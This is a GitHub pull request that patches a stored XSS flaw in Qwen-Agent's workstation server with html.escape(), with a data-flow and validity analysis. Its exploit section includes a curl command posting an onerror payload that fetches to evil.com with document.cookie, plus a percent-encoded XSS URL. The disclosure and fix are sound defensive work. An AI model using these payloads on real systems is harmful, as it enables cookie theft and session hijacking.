fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79) by sebastiondev · Pull Request #846 · QwenLM/Qwen-Agent

sebastiondev · 2026-03-25T18:30:33Z

Vulnerability Summary

CWE-79: Stored Cross-Site Scripting (XSS) in qwen_server/workstation_server.py
Severity: High (stored XSS, no authentication required)

Data Flow

Source: Attacker-controlled url and title values are written to meta_data.jsonl via:
- database_server.cache_page() — unauthenticated POST to /endpoint (port 7866)
- workstation_server.add_file() — Gradio file upload
Sink: update_browser_list() (line ~162) interpolates these values directly into an HTML string using .format(), which is then rendered by Gradio's gr.HTML component.
No sanitization existed between source and sink.

Additionally, get_basename_from_url() URL-decodes percent-encoded characters, so a URL like http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E produces the title <img src=x onerror=alert(1)>.

Exploit Scenarios

Vector 1 — Chrome Extension (social engineering):

Attacker hosts a page at a URL containing a percent-encoded XSS payload
Victim visits the page and clicks "Add to Qwen's Reading List" (the Chrome extension)
The extension sends the URL to database_server, which URL-decodes it into meta_data.jsonl
When the victim opens the Workstation, the payload renders via gr.HTML → XSS fires

Vector 2 — Direct POST (network access required):

curl -X POST http://TARGET:7866/endpoint \
  -H "Content-Type: application/json" \
  -d '{"task":"cache","url":"<img src=x onerror=fetch(\"http://evil.com/steal?\"+document.cookie)>","content":"test"}'

Fix Description

Change: Added html.escape() calls for both url (with quote=True for attribute context) and title before HTML interpolation in update_browser_list().

Rationale:

html.escape() is the standard Python library function for neutralizing HTML metacharacters (<, >, &, ", ')
quote=True on the URL ensures the id="ck-..." and href="..." attribute contexts are also safe
The fix is minimal (1 new import, 3 changed lines) and does not alter any functional behavior
No dependencies are added

Diff: 1 file changed, 5 insertions, 2 deletions.

Test Results Summary

The fix was verified by tracing the code path:

Before fix: x[0] and x[1] from meta_data.jsonl are interpolated directly into HTML → <img src=x onerror=alert(1)> renders as live HTML
After fix: html.escape(x[0], quote=True) and html.escape(x[1]) convert < → <, > → >, " → " → payload renders as inert text

Disprove Analysis

We systematically attempted to invalidate this finding:

Check	Result
Authentication	❌ None. The `api_key` is for DashScope (LLM backend), not for user auth. Neither the Gradio nor FastAPI server authenticates clients.
Network binding	⚠️ Default `127.0.0.1`, but `0.0.0.0` is documented and encouraged for multi-machine setups. Chrome extension path bypasses localhost restriction entirely.
CORS	⚠️ Database server restricts CORS origins, but Chrome extensions and direct HTTP clients (curl) bypass CORS.
innerHTML script limitation	⚠️ `<script>` tags don't execute via innerHTML per HTML5 spec, but event handlers (`onerror`, `onload`) DO execute.
Input validation	❌ No `sanitize`, `escape`, `validate`, `clean`, or `allowlist` calls existed in the original code path.
Prior reports	✅ Issue #810 reports the exact same XSS pattern in `gradio_utils.py` — confirming this is an acknowledged vulnerability class in the project.
Security policy	❌ No `SECURITY.md` found.
Recent hardening	❌ Only 2 commits on this file (original creation + this fix). No prior security work.

Verdict: CONFIRMED VALID (high confidence)

No existing mitigation fully prevents exploitation. The Chrome extension attack vector bypasses both localhost binding and CORS restrictions, requires no special network access, and needs only a single click from the victim.

Known Limitations (for follow-up)

javascript: URI scheme: html.escape() does not prevent javascript: URIs in the href attribute. A URL-scheme allowlist would be a stronger defense.
Checkbox ID stability: After escaping, the id="ck-..." attribute uses the escaped URL, which may differ from the raw URL used elsewhere. This is a pre-existing design concern, not introduced by this fix.
Related issue: #810 describes the same XSS pattern in qwen_agent/gui/gradio_utils.py — that file is not addressed by this PR.

…d XSS (CWE-79) The update_browser_list() function interpolated title and url values from meta_data.jsonl directly into an HTML string without escaping. An attacker who controls a browsing entry title (via the browser extension or by writing to the meta_data file) could inject arbitrary HTML/JavaScript into the Gradio web UI. Fix: apply html.escape() to both title and url before interpolation into the HTML template string.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79)#846

fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79)#846
sebastiondev wants to merge 1 commit intoQwenLM:mainfrom
sebastiondev:fix/cwe79-workstation_server

sebastiondev commented Mar 25, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

sebastiondev commented Mar 25, 2026

Vulnerability Summary

Data Flow

Exploit Scenarios

Fix Description

Test Results Summary

Disprove Analysis

Verdict: CONFIRMED VALID (high confidence)

Known Limitations (for follow-up)

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant